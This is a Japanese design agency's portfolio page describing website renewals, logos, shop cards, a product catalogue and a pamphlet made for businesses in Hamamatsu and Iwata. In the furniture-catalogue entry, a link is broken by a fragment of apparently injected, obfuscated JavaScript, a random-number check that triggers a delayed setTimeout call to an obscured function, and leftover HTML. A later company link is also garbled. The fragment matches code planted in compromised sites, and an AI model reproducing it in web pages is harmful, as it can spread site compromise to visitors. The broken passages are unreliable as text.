55634|中小企業のブランディング

静岡県のブランディング事例

ホームページリニューアル実績|まるたけ堂珈琲/くつろぎ庵(浜松市)

ホームページリニューアル実績|まるたけ堂珈琲/くつろぎ庵(浜松市)

浜松市中区佐鳴台にある、まるたけ堂珈琲さんとくつろぎ庵さんのホームページのリニューアルをさせていただきました。

https://mc-ka.com/

まるたけ堂珈琲さんは、無農薬栽培で育てた珈琲豆で淹れる珈琲を味わえる珈琲専門店。くつろぎ庵さんは、女性専用のヨガ教室で、女性特有の悩みや、心と身体に寄り添ったヨガを実践されています。

2018年にご夫婦でオープンして以来、ロゴマーク(まるたけ堂 珈琲くつろぎ庵)や看板ショップカードなどのブランディングデザインも手がけさせていただいています。

創業して3年の月日が経ち、情報発信の内容を整理したり、オンラインショップへの誘導の強化についてのご相談を受け、今回のリニューアルでは、メインメニューを見やすくしたり、動画撮影、ムービー制作をするなどの見た目の刷新はもちろん、お二人の取り組みや想い、メッセージを伝えるため、より充実したホームページにリニューアルしました。

トップページを開くと、両店舗のロゴが大きく映し出され、その後に動画が流れます。こちらの動画には、まるたけ堂珈琲さんのゆったりとした店内や、コーヒー豆の焙煎など雰囲気が伝わるよう編集しています。

動画の下には、各カテゴリトップへのバナーを配置しています。大きなバナーがあることで、ホームページを訪れる人が必要とする情報へスムーズに移動することができます。

また、動画と各カテゴリトップへのリンクは、パソコンとスマホで表示を切り替え、どちらの画面でも見やすいよう、縦横比とサイズを調整しています。

コンテンツメニューのトップには、お店の核となる「想い」について取材編集をさせていただき、掲載しています。

その他にはお店のこだわりやメニュー、ヨガのプログラム内容、問診フォームなどのページを掲載。

これらの情報は以前のホームページにも一部記載していましたが、リニューアルを機に、ページの組み替えを行いました。

このように元々のコンテンツと新しいコンテンツを違和感なくまとめることで、ブランドイメージの統一感と持続性が保たれます。

また、オンラインショップのページを開くと、画面下にSTORESへのポップアップが表示され続け、動線をスムーズにしています。

こちらのネットショップに使う写真などもデザインし、監修させていただきました。

今回は見た目の刷新はもちろん、お二人の「想い」が伝わるホームページにリニューアルできたかと思います。両店舗が、遠州地域をはじめ、全国にファンが広がるのを期待しています。

 

●まるたけ堂珈琲・くつろぎ庵/https://mc-ka.com/

プロがデザインしたホームページの制作実績はこちら

●この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
コンテンツが充実したホームページにリニューアル|ランドデザイン「ホームページ」デザイン

 

商品カタログデザイン実績|「かんかく家具」ランドデザイン(浜松市)

商品カタログデザイン実績|「かんかく家具」ランドデザイン(浜松市)

浜松市中区幸で、主に浜松市近郊の保育園やこども園、福祉施設を手がけるランドデザインさんの商品カタログのデザインをさせていただきました。

以前にもホームページのリニューアルをさせていただきましたが、今回はこれまでにランドデザインさんが保育園やこども園を建築設計する中で手がけられた家具「かんかく家具」を、一般販売するにあたっての商品カタログデザインのご依頼でした。

ランドデザインさんのホームページでも「かんかく家具」をご紹介するandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and-kodomo.com/gallery/”>商品ストーリー記事の取材編集をさせていただき、今回はWEBと紙との連動した商品カタログになっています。

商品カタログには読み手が必要な情報をフォーカスして掲載し、WEBには掲載しきれなかった細かい情報を掲載しています。

商品カタログはA4サイズで、全24ページで構成。用紙の素材は、企業姿勢を表す環境に配慮した上質再生紙を選びました。

最近では環境意識の高まりもあり、環境に配慮した商品カタログ制作のお問い合わせも増えてきました。印刷の仕上がりとしては、発色を抑えた、ややマットな仕上がりとなります。

光沢が少なく、若干グレーがかった、落ち着いたイメージの風合いです。

本文では、かんかく家具の開発秘話から使い方、バリエーション、素材のこだわりなど、丁寧に説明しています。

画像も豊富にレイアウトすることで、見る側にとっての安心感にもつながります。

最後のページには、ランドデザインさんがこれまでに設計を手がけた建物の実績紹介や会社概要を掲載。

WEBだけで商品を紹介することはもちろん意味のあることですが、今回の「かんかく家具」を検討されるお客さまは主に保育園やこども園の園長さんや保育士さん。

保育園でのスタッフミーティングなど、大勢の方に見てもらうには、紙媒体の方がわかりやすく、記憶に残りやすいかと思います。

SNSの登場などでここ数年、パンフレットや商品カタログなどの紙媒体が需要が減少していますが、WEBと連動させ、同じ情報を印刷物とWEBの特性を活かしてデザインすることで、マーケティング上の重要なツールとして役割を担ってくれます。

子どもたちが、形や色を自らの五感を通して、感性を育む「かんかく家具」。多くの子どもたちが、この楽しい家具に触れる機会が増えるといいですね。

 

プロがデザインしたロゴマークの制作実績はこちら

この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
新ブランド立ち上げに伴うロゴマーク制作|kido「ロゴ」デザイン

 

 

ショップカード制作実績|まるたま製茶(浜松市)

ショップカード制作実績|まるたま製茶(浜松市)

浜松市北区細江町にあるまるたま製茶さんで、ブランディングアドバイザーとして関わらせていただいていますが、今回ショップカードをリニューアルするということで、これまでの素材をいかしてデザインしました。

イラストは手持ちのイラストを使い、のれんに使っているお茶のマークをグラフィックデザイン化しています。

まるたま製茶さんでは、除草剤を一切使わず、農薬・化学肥料を減らしたお茶づくりを実践されています。

また、佐鳴湖の浄化対策の一つである「ヨシ刈り」のヨシを茶畑で使用し、ヨシを敷くことで雑草や乾燥を防ぎ、お茶も元気に育つ環境保全型の循環を生んでいます。

そんなまるたま製茶さんでは、不定期でプチワークショップを開催していて、SNSなどでもじわじわと人気を集めています。

おもて面は、のれんに使われているお茶のマークをグラフィックデザイン化し、体験小屋の画像を下に配置しています。

ひと目でお茶屋さんのショップカードだと伝わり、目に留まりやすいデザインかと思います。

うら面には、手持ちのイラストの地図を配置し、プチワークショップの紹介や、インフォメーションを掲載。

小さなショップカードでも、伝えたい情報を整理して掲載することで、お客さまの印象に残るカードになるかと思います。

スマホで何でも検索時代ですが、ひと目でお店のインフォメーションや雰囲気が伝わるショップカードは集客に有効なツールです。

このショップカードを見て、多くの方が訪れるきっかけになればと思います。

この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
地域の伝統を伝えるパンフレットデザイン|ぬくもり工房「パンフレット」デザイン

 

ホームページ制作実績|ランドデザイン(浜松市)WEBリニューアル

ホームページ制作実績|ランドデザイン(浜松市)WEBリニューアル

浜松市中区幸で、主に浜松市近郊の保育園やこども園、福祉施設などの建物を設計されている、ランドデザインさんのホームページの、リニューアルデザインを手掛けました。

https://land-kodomo.com/

今回のホームページリニューアルでは、動きをつけたレイアウトをつけるなど、見た目の刷新はもちろん、ブランディングの中核となる大切にしている想いや、メッセージ、取り組みを伝えるためのコンテンツを追加して、より充実したホームページにすることがリニューアルの目的です。

トップページには、まずは大きなスライドショーが目に入ります。画像の中央には「子どもが自然とたのしくなる。そんな環境を考えつづけているこどもに学ぶ設計事務所です。」というメッセージを添え、ランドデザインさんの世界観を感覚的に伝えています。

トップページをスクロールすると、各サービスのカテゴリトップへのリンクを配置しました。スクロールに合わせて、ゆっくりふわっと表示したり、メニューバーにアニメーションをつけるなど、目を引くデザインに。

さらにスクロールを続けると「けんちくストーリー」が表示されます。クリックして開くと、ランドデザインさんが手がけた建物の誕生のストーリーを読むことができます。

けんちくストーリーでは、土地探しをはじめ、建物の構想や、その取り組みの中で感じた気づきなど、普段あまり知ることのできない建築の”うら側”についてお届けしています。

こちらのけんちくストーリーの構成・編集についても、すべて当社におまかせいただきました。

「代表メッセージ」には、ランドデザインさんが大切に考える、子どもたちの感性を育む、ものづくりに対する想いを伝えています。

「かんかく家具」のページは、まだページ自体は準備中ですが、ランドデザインさんでは建築のほかに、家具の制作も行っています。今後随時、制作事例が更新されるかと思います。

その下には、最新のブログが表示されるようになっています。こちらはスタッフの方がブログ記事を入力すると、自動的にトップページに表示される仕組みです。

そのほか、採用情報や会社紹介を掲載。

会社の想いや求める人材、仕事内容について写真と文章を掲載することで、実際に働く姿をイメージしやすいよう工夫しています。ランドデザインさんらしさが伝わるページに仕上がっているかと思います。

子どもたちが過ごす園舎は、どうしても大人が「管理しやすい」場になってしまいがちですが、子どもたちがのびのびと、自らが「遊びたくなる」場であることが大事とランドデザインさんは言います。

子どもたちが元気に、たくましく育つ園舎が、この地域に増えていくといいですね。

 

●株式会社ランドデザイン/and-kodomo.com” target=”_blank” rel=”noopener noreferrer”>https://land-kodomo.com

プロがデザインしたホームページの制作実績はこちら

●この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
「安心感」のあるこども園のWEBデザイン|微笑こども園「ホームページ」デザイン|静岡|湖西

 

ロゴデザイン制作実績|行政書士南部事務所(浜松市)

ロゴデザイン制作実績|行政書士南部事務所(浜松市)

浜松市中区高林にある行政書士南部事務所さんのロゴマークをデザインさせていただきました。

南部事務所さんは、農地転用や除外申請をはじめとする、農地手続きに特化した行政書士事務所です。

温暖な気候の浜松は、農業が盛んな地域。使わなくなった農地に建物を建てたり、太陽光パネルを設置する時に、気軽に相談できる「農地手続きの専門家」がいると頼りになりますよね。

ロゴマークは、南部さんのお子さんのお名前をモチーフにデザインしました。太陽と凪を究極まで抽象化し、オレンジと水色が混じり合う円で表現しています。

依頼人を照らす太陽と、静かなイメージの凪を別々のものとするのではなく、それぞれの要素が寄り添い、影響を与えることで、より充実したサービスを行えることが伝わります。

中央のラインは書類にインクで書かれた文字を象徴し、行政書士の業務を表しています。また、やさしい色あいは、「何でも相談できる安心感」を感じさせます。

背景をオレンジにしてロゴを白抜きにすると、存在感が増し、将来に向けてエネルギーが満ちるような、力強さを感じる色あいが際立ちます。

「行政書士の業務を通して、たくさんの人たちを照らしたい」という南部事務所さんの想いが伝わるロゴデザインになったかと思います。

これからも地域の人たちを支える行政書士として、ご活躍が楽しみです。

プロがデザインしたロゴマークの制作実績はこちら

この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
農家の個性を感じるロゴデザイン|あったか農場「ロゴ」デザイン|静岡|浜松

 

ホームページ制作実績|hiro furniture(浜松市)

ホームページ制作実績|hiro furniture(浜松市)

浜松市中区相生町で、東京をはじめ全国にファンが広がる家具ブランド「hiro furniture」さんがホームページをリニューアルすることになり、デザイン制作を担当させていただきました。

https://1-hiro.com/

これまでに会社案内・パンフレットもデザインさせていただきました。

hiro furnitureさんでは、オリジナル家具の製作販売のほかに、新築住宅や店舗のデザイン、ガーデン設計など、さまざまな事業を展開されています。

無骨なようでいて、素材のあたたかみを感じるhiro furnitureさんの家具や建物は、見た目の質感だけでなく、経年変化で生まれる風合いを楽しめ、使い込むほど愛着がわくのが魅力です。

トップページには、大きなスライドショーを配置し、サイトを訪れたユーザーにhiro furnitureさんの世界観を感覚的に伝えます。

その下には「Concept Story」「Home Design」「Shop & Office Design」「furniture」「Renovation」などの主要なカテゴリーをわかりやすく配置しています。

コンセプトページには、hiro furnitureさんのものづくりの原点にはじまり、家具や家づくりについてのこだわりや、大切にしてることなどのストーリーを掲載。

気がつけばついつい読み言ってしまう「読み物」のように伝えることで、ブランドへの共感や理解が生まれるかと思います。

バナーをクリックすると各ページごとに、使用する素材のこだわりや、空間づくりをする中で大切にしていることなどを伝えています。

読み疲れないよう、画像と文章の余白のバランスを調整しながら配置しています。

施工事例を見るとクリックすると各ページの事例が並びます。

スマホ表示では画像が画面いっぱいに表示されます。また、事例ページでは画像をたっぷりと使っているので、これから依頼を検討されているお客さまの参考になるかと思います。

スタッフページには、hiro furnitureさんではたらくスタッフの方々の想いを掲載しています。

ものづくりへの取り組み、お客さまとの向き合い方、一緒にはたらく仲間との関係性など、読むとスタッフの方々の人となりが垣間見れます。

ご依頼の流れでは、各カテゴリーごとにご相談から完成までの流れを掲載し、問い合わせページへと誘導しています。

ホームページのリニューアルのお話を受けた際、以前までのホームページやパンフレットは写真がほとんどで、なかなか文章で伝えられていないというお悩みをうかがいました。

今回のリニューアルで、会社のサービスや実績をまとめられたのはもちろん、さまざまなストーリーを掲載することでhiro furnitureさんの根底にある「価値観」が伝わる内容になったかと思います。

●hiro furniture株式会社/https://1-hiro.com/

プロがデザインしたホームページの制作実績はこちら

●この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
動画を活用したホームページ制作|スプラウト「ホームページ」デザイン|静岡|浜松

 

ロゴデザイン制作実績|まごえ農園(磐田市)

ロゴデザイン制作実績|まごえ農園(磐田市)

磐田市で純国産のえごま油の製造・販売を手がける「MAGOE農園」さんのロゴマークをデザインさせていただきました。

MAGOE農園さんでは、遠州地域で栽培されたえごまを搾油機でえごま油にして販売しています。代表の鈴木さんは、勤め先を早期退職され、4〜5年前から「遠州えごまの会」をとりまとめて、主に還暦世代の人たちがえごまの栽培を通して、地域と繋がり、健康的に暮らす社会を作りたいという想いで活動してこられました。

これまで地域の直売所やファーマーズ等での取り扱いが中心でしたが、本格的にブランド化していくにあたり、ロゴマークのご相談をいただきました。

ロゴマークは、えごまの穂をモチーフにした円の中に、大きく「ま」の文字をあしらったシンプルなデザイン。「ま」の下の山のような線もイニシャルの「M」とかけています。山や緑を連想させつつ、自然と調和した健やかな暮らしをイメージさせます。

大きな「ま」の文字が目印になり、一度見ただけで印象に残るデザイン。また、えごまの穂の部分や曲線には繊細さもあり、どことなく上品な雰囲気が漂っています。

えごま油は、オメガ3脂肪酸の含有量が高く、さまざまな現代病の予防につながる、ここ数年注目の食材です。

地元で手間暇かけて作られたMAGOE農園さんのえごま油が、地域の人たちの食卓に届き、健康で豊かな暮らしを支える存在となりそうですね。

プロがデザインしたロゴマークの制作実績はこちら

●この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
シンプルな図形の組み合わせで伝える|永田木材「ロゴ」デザイン|静岡|浜松

 

ホームページ制作実績|ゼロワン(浜松市)WEBリニューアル

ホームページ制作実績|ゼロワン(浜松市)WEBリニューアル

浜松市中区田町でVR撮影・3Dモデル・IOT開発などを手がける株式会社ゼロワンさんがこのたび、ホームページをリニューアルすることになり、デザイン制作を担当しました。

https://zeroone-1.com/

これまでにロゴマークパンフレット名刺など、さまざまなデザインを手がけさせていただいています。

会社設立から約2年のゼロワンさんでは、新たなサービスやシステム開発をされ、それらのサービスを効果的に情報発信をしたいというご相談を受けました。

トップページには、空間をスキャンできる特殊なカメラで撮影するMatterport(マターポート)で撮影された動画を埋め込んでいます。

施設内をさまざまな角度から見ることができ、バーチャルツアーに参加しているような臨場感を楽しめます。

今回のリニューアルでは、コンテンツごとに動きのあるレイアウトに仕上げ、青や緑をメインカラーにすることで、さわやかさや信頼感を与えつつ、インパクトを与えるデザインとなっています。

メニューボタンも、最近では通常のハンバーガーボタンだけではなく、新しい動きのボタンが見られるようになってきました。今回は、メニューボタンをクリックすると、メニューの円が拡大されるように展開するアニメーションになっています。

また、左上のロゴマークをクリックすると、回転する動きになっており、随所に遊び心を散りばめています。

さらにスクロールすると、左から右へ、視線の動きに合わせてバナーが登場し、見る人を飽きさせません。

もちろんスマホ対応も行っており、レイアウトも考慮してデザインし、どちらの画面でも見やすいよう、縦横比とサイズを調整しています。

活用事例には、ALL、VR、3DVR、360°撮影のカテゴリに分け、表示させています。画面のスクロールに合わせて、左のほうから画像や文字が流れてくるという動きをつけ、目を引くデザインに。

「よくある質問」のページは、Q&A方式で掲載しました。もちろんここに記載のない質問に関しても、随時受け付けているので、一番下にお問い合わせフォームも設置しています。

 

新たなサービスをはじめられたゼロワンさん。浜松から全国の方々にゼロワンさんのサービスが広がっていくのを期待しています。

●株式会社ゼロワン/https://zeroone-1.com/

プロがデザインしたホームページの制作実績はこちら

●この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
WEBデザインで保険代理店の「強み」を伝える|フォースワンAG「ホームページ」デザイン|静岡|浜松

 

ホームページ制作実績|サカエ(浜松市)WEBリニューアル

ホームページ制作実績|サカエ(浜松市)WEBリニューアル

浜松市で伝動・油空圧機器や検査装置を取り扱うサカエさんがホームページをリニューアルすることになり、デザイン制作を担当させていただきました。

https://www.sakae-jp.com/

今回のリニューアルでは、会社情報やサービス紹介のほかに、コンテンツを充実させる目的で、エンジニアにとって役立つ技術情報を『Engineer Knowledge』という形でまとめて運営し、採用情報を『Work Engine』という読み物形式で運営する仕様になりました。

トップページを開くと、『エンジニア目線で「ものづくり」を支える』というキャッチコピーを添えた画像がスライド形式で目に入ります。その下には、各ページのカテゴリトップへのリンクを配置しました。

ソルーションページを開き、画面をスクロールしていくと、ふわっと画像が浮かび上がるよう動きをつけ、目を引くデザインになっています。

採用情報のページには、ワークスタイルやシゴト雑学などのコンテンツとともに、以前より弊社でデザインを手がけさせていただいた、採用特設サイトの社員インタビューや代表インタビューを掲載。

サカエさんでは、以前から求人のお知らせやインタビュー記事を掲載していましたが、こちらもしっかりと1つのコンテンツとしてまとめることで、興味を持った方が気になる情報を見つけやすくなります。

会社の想いや求める人材、仕事内容についての詳細を掲載することで、実際に働く姿をイメージしやすいよう工夫しました。

社員・代表インタビューの取材・編集は弊社で担当しています。

また「数字で見るサカエ」のページには、サカエさんの歴史をはじめ社員の男女比や勤続年数、新卒・中途比率など、グラフにして紹介しています。表示される瞬間に動きがあるのも特長です。

さまざまなメーカーのエンジニア担当の方の実務に役立つ情報をお伝えし、豊富な画像や動画で、ものづくりに役立つ知識が満載です。

今回のリニューアルで、専門的な業務はもちろん、働くスタッフの方々の人柄がやサカエさんの強みや誠実さを表現できたかと思います。

 

●株式会社サカエ/https://www.sakae-jp.com/

プロがデザインしたホームページの制作実績はこちら

●この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
動きのあるデザインにWEBサイトをリニューアル|ゼロワン「ホームページ」デザイン

 

ホームページ制作実績|ジージーネットワークス(浜松市)

ホームページ制作実績|ジージーネットワークス(浜松市)

浜松市西区大久保町で、主に法人向けに通信回線の構築・通信機器設置や、保守・メンテナンスサービスなどを手がけられているジージーネットワークスさんのホームページをデザインさせていただきました。

https://ggnetworks.co.jp/

ジージーネットワークスさんでは、オフィスの移転時に伴うパソコンまわりの設定や、リモートワークのための通信環境設定など、オフィス環境に関する身近なサービスを、豊富な経験と専門知識で快適に整えてくれます。

今回、ロゴマークと合わせてホームページのデザインについてご依頼いただきました。

ホームページは、緑色や黄緑などを基調とすることで、ジージーネットワークスさんの信頼感や安定感などを表現し、ロゴマークと一貫したデザインにまとめています。

トップページには、オフィスの風景をはじめ、エンジニアスタッフの作業風景をを撮影した画像をスライドで掲載しました。実際に作業している様子を見ることで、安心感や親しみやすい空気が伝わるレイアウトに仕上げています。

事業内容には、サービスをお探しのお客さまがわかりやすいよう、さまざまなサービスを掲載。

よくある質問のページには、イラストを配置しながら、よく寄せられるお客さまからのご質問と回答をまとめました。

施工事例のページでは、ご相談内容や作業内容を掲載し、わかりやすくまとめています。

また、お客さまからの声も掲載することで、会社の信頼性や安心感を高めるだけではなく、問い合わせ依頼をしようか迷っているお客さまの背中を押す、大切な役割があるかと思います。

会社紹介のページでは、会社概要やアクセス、社名の由来、スタッフを紹介しています。代表メッセージからは、代表の人柄や想い、熱意、きめ細やかな対応が伝わるかと思います。

また、実際に働くスタッフの方々の顔を見ると親近感や安心感、会社の雰囲気がわかります。

お問い合わせはLINEかメールフォームから受けることができます。ホームページで問い合わせを受けている企業は多いと思いますが、最近では、LINEで問い合わせできるかどうかも大切になってきています。

ホームページ全体を通して、多岐にわたるサービスの紹介、施工事例、お客さまの声など、ジージーネットワークスさんらしさを大切にしながらデザインさせていただきました。

現代社会では欠かすことのできないネットワークを、地域で支えるジージーネットワークスさん。親身に相談にのってくださる会社が身近にあると安心ですね。

■ジージーネットワークス/https://ggnetworks.co.jp/

プロがデザインしたホームページの制作実績はこちら

この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
動きのあるデザインにWEBサイトをリニューアル|ゼロワン「ホームページ」デザイン

 

ホームページ制作実績|「kido」上村木工(浜松市)

ホームページ制作実績|「kido」上村木工(浜松市)

浜松市東区大瀬町に本社をかまえる上村木工さんの新ブランド「kido」のホームページのデザインを手掛けました。また、ホームページデザインの素材になる商品写真の撮影も行いました。

https://kido-omocha.com/

1949年に創業して以来、注文家具の製作など、家具を作ることを通して「木」という素材に向き合い続けてこられた上村木工さん。

そんな上村木工さんが「木の素晴らしさを子どもたちに伝えたい。人と自然の距離が近くなるように、子どもと自然を繋ぐ道を作りたい。」という想いから、2021年に新ブランド「KIDO(木道)」を立ち上げ、木のおもちゃ専門店をはじめられました。

トップページには、さまざまな積み方が楽しめる、国産ヒノキでできたドーナッツ型の積み木の画像を配置しています。

「想い」のページでは、kidoの誕生ストーリーや、kidoが柱とする「2つの手を大切にする」について伝えています。

kidoの世界観や、「作り手」「使い手」へのこだわりについて共感してもらえるかと思います。

コンセプトのページには、kidoが取り扱う3つのラインを紹介しています。

この3つのラインは、世界中から選りすぐりのおもちゃをセレクトした「 International Line」、日本全国からセレクトした「Japan Line」、卓越した木工技術を持つ名工とコラボし、静岡発のおもちゃを生み出す「Fuji Line」に分けてご案内しています。

自社製造のオリジナル玩具もFuji Lineからリリースします。

職人さんの画像を掲載し、熟練した技術を伝えるともに、こだわりや想い、強みも感じてもらえるかと思います。

オンラインショップのページからは、STORESに飛べるようにしており、簡単に購入可能です。

kidoでは今後、国内外からセレクトした、価値ある本物のおもちゃや、日本の匠の手によって生み出された木のおもちゃを取り扱われる予定です。

新ブランドを立ち上げたばかりの上村木工さん。自然を身近に感じることのできるおもちゃが、多くのお子さんのもとに届いたら嬉しいですね。

■kido/https://kido-omocha.com/

プロがデザインしたホームページの制作実績はこちら

この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
WEBデザインで商品の魅力をわかりやすく伝える|まごえ農園「ホームページ」デザイン

 

ロゴデザイン制作実績|ジージーネットワークス(浜松市)

ロゴデザイン制作実績|ジージーネットワークス(浜松市)

浜松市西区大久保町で、法人向けに通信回線の構築・通信機器設置や、保守・メンテナンスサービスなどを手がけられているジージーネットワークスさんのロゴマークをデザインさせていただきました。

通信回線の構築や通信機器の設置などと聞くとあまり馴染みがないように聞こえますが、例えば、オフィスの移転時に伴うパソコンまわりの設定や、リモートワークのための通信環境設定など、オフィス環境に関する身近なサービスを、ジージーネットワークスさんの豊富な経験と専門知識で快適に整えてくれます。

ロゴマークには、中央に出会いの新芽をあしらい、顧客と自社を2つの「G」で表現し、2つの「G」がともに成長していく姿を表現しています。また、2つの矢印も右肩上がりを演出しながら「成長」と「発展」をしていくイメージで仕上げました。

信頼感や安定感を与える緑色をセレクトし、電気設備には欠かせない確かな信頼と安心を提供する、ジージーネットワークスさんにピッタリの色合いです。

太めですっきりとした文字は、親しみやすく、カジュアルすぎない品の良さもあります。

テレワークやリモートワーク化が進む昨今。オフィスのネットワーク環境の整備が欠かせません。地元密着のジージーネットワークスさんのような会社が身近にあると安心ですね!

プロがデザインしたロゴマークの制作実績はこちら

この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
起業の想いを込めたロゴデザイン|株式会社ゼロワン「ロゴ」デザイン

 

ロゴデザイン制作実績|「kido」上村木工(浜松市)

ロゴデザイン制作実績|「kido」上村木工(浜松市)

浜松市東区大瀬町に本社をかまえる上村木工さんの新ブランド「kido」のロゴマークをデザインさせていただきました。

上村木工さんは1949年に創業して以来、注文家具の製作など、家具を作ることを通して「木」という素材に向き合い続けてこられました。

そんな上村木工さんが「木の素晴らしさを子どもたちに伝えたい。人と自然の距離が近くなるように、子どもと自然を繋ぐ道を作りたい。」という想いから、2021年に新ブランド「KIDO(木道)」を立ち上げ、木のおもちゃ専門店をはじめられました。

半世紀以上ものあいだ「木」と向き合ってこられた上村木工さんだからこそ伝えられる、「木」の価値を実感してもらえる専門店かと想います。

kidoでは今後、世界中からセレクトした、価値ある本物のおもちゃや、日本の匠の手によって生み出された木のおもちゃを取り扱われる予定です。

ロゴマークには、そんな上村木工さんの想いを形にしました。長い年月をかけて大きくなった「木」という素材への敬意を込めて、木の年輪をモチーフにしたデザインになっています。

さらに、幹をあらわすえんじ色の円は、手描きのように少しランダムにすることで、堅くなりすぎず、カジュアルな表情をプラスしています。

また、日本らしさを感じる伝統的な色合いに仕上げたので、海外の方が見ても日本らしさを感じられ、伝統とモダンさの両方を感じられるデザインかと思います。

シンプルな線のみの、少ない要素で構成しているので、親しみやすく、覚えやすいロゴマークになりました。

2021年にスタートしたばかりの「kido」。これからの活躍が楽しみですね。

プロがデザインしたロゴマークの制作実績はこちら

この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。

農業や農家の空気感を伝えるロゴマーク|あったか農場「ロゴ」デザイン

 

ロゴデザインリニューアル制作実績|天竜自動車運送(浜松市)

ロゴデザインリニューアル制作実績|天竜自動車運送(浜松市)

浜松市浜北区で、日本全国に自動車部品などの輸送を行う、天竜自動車運送さんのロゴマークをデザインさせていただきました。

昭和40年に木材を輸送する物流会社として設立された天竜自動車運送さんは、その後木材に加え、自動車や二輪車などの製品や部品の輸送を行っています。

天竜自動車運送さんでは、これまで使われてきた既存のロゴマークがありましたが、2〜30年前に制作されたものなので、今の時代に合うデザインにブラッシュアップしたいというご相談を受けました。

ロゴマークは、既存のロゴマークをベースにしつつ、モダンな印象に仕上げ、TをRの輪郭が道路のように周りを形づくり、Rをワンポイントに表現しています。

また、ロゴにはコーポレートカラーである青と赤を使用し、文字は、シンプルで親しみやすい印象のフォントをセレクトしました。

ロゴマークは企業にとって「顔」ともいえるもの。

このように長年慣れ親しんだ、既存のロゴマークとうまく融合し、現代的なロゴマークにアップデートすることも可能です。

2021年春に新拠点が完成して、新たなステージを迎えた天竜自動車運送さん。リニューアルされたロゴマークが、たくさんの方々の目にとまるのを期待しています。

プロがデザインしたロゴマークの制作実績はこちら

この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
ロゴのリニューアルでバランスを調整|SKiP「ロゴ」リニューアル

 

パンフレットデザイン実績|制服のキンパラ(浜松市)

パンフレットデザイン実績|制服のキンパラ(浜松市)

浜松市や磐田市など静岡県西部を中心に、制服の製造・販売をするキンパラ株式会社さんのパンフレットをデザインさせていただきました。

キンパラ株式会社さんは、地元では通称「制服のキンパラ」と親しまれ、創業80年以上の老舗メーカーです。浜松にお住まいの方なら学生服をキンパラさんで購入したという方も多いのではないでしょうか。

学生服をはじめ、大手企業グループのユニフォームや制服の製造を手がけられています。

パンフレットはA3サイズ、二つ折りの4ページで構成。

おもて面には「“制服はどこで買っても同じ”そう思っていませんか?」と気になるキャッチコピーを添え、中面を開くきっかけにしています。

本文には、キンパラさんの強みである自社工場をアピールしました。

自社工場で制服がどのように作られているか、臨場感が伝わるように縫製工場の写真撮影もさせていただきました。商品が作られる裏側の作業工程をしっかり伝えることで、お客さまの安心感につながるかと思います。

また、3年間気持ちよく過ごせるよう、購入後のアフターフォローも記載。

「上着の袖丈をのばしたい」「スカートの丈を長くしたい」など、お子さんの成長に合わせて、さまざまな調整を3年間無料で行ってくれるのは、親御さんにとっても嬉しいポイントです。

また、丈夫で手入れがしやすく、ラクな着心地や、機能性についても、イラストを取り入れながら、わかりやすく伝えています。

さらにその下には、入学準備に関するスケジュールも記載。入学式まで何かと準備の多いものです。このようにスケジュールをご覧になっていただければ、入学準備のシュミレーションもしやすいかと思います。

またキンパラさんでは、超早期予約特典や早期予約特典などのプレゼントもあり、そのスケジュールも記載されているので、こちらのパンフレットを1枚持っていると安心かもしれません。

うら面には、早期予約特典プレゼントの案内を記載しています。さまざまな嬉しいサービスが満載なので見逃せませんね。

こちらのパンフレットを通して、制服のキンパラさんでご購入を決めた学生の方々が、3年間着心地良く快適に制服を着て過ごせると幸いです。

 

この記事を読まれた方には下記のページもおすすめです。合わせてお読みください。
商品の「想い」や「魅力」が伝わるパンフレット制作|障害福祉サービス事業所だんだん「パンフレット」デザイン